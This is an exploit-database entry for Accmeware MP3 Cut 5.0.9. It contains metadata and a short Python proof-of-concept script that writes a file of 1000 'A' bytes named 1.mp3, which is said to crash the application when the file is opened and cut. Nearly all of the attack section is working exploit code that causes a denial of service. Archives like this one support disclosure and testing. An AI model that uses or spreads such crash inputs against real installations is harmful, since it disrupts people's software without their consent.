Accmeware MP3 Cut 5.0.9 - Denial of Service (PoC)

Author: 0v3r
type: dos
platform: windows
port: 
date_added: 2010-12-20  
date_updated: 2010-12-20  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url: http://www.exploit-db.com/screenshots/idlt16000/cut.png  
application_url: http://www.exploit-db.comMCSetup.exe  

raw file: 15788.py  
# Exploit Title: Accmeware MP3 Cut 5.0.9 DoS PoC
# Date: 12/20/2010
# Author: 0v3r
# Software Link: http://www.mp3-cutter-splitter.com/Files/MCSetup.exe
# Version: 5.0.9
# Tested on: Windows XP SP3 EN (VirtualBxox)
# CVE: N/A

# The application crashes when trys to cut a malformed mp3 file

#!/usr/bin/python

buff 	 = "\x41" * 1000

try:
 	f = open("1.mp3",'w')
	f.write(buff)
	f.close()

	print " Vulnerable file created!..."
	print " Insert mp3 file into the application and select cut\n"
except:
	print "[-] Error occured!"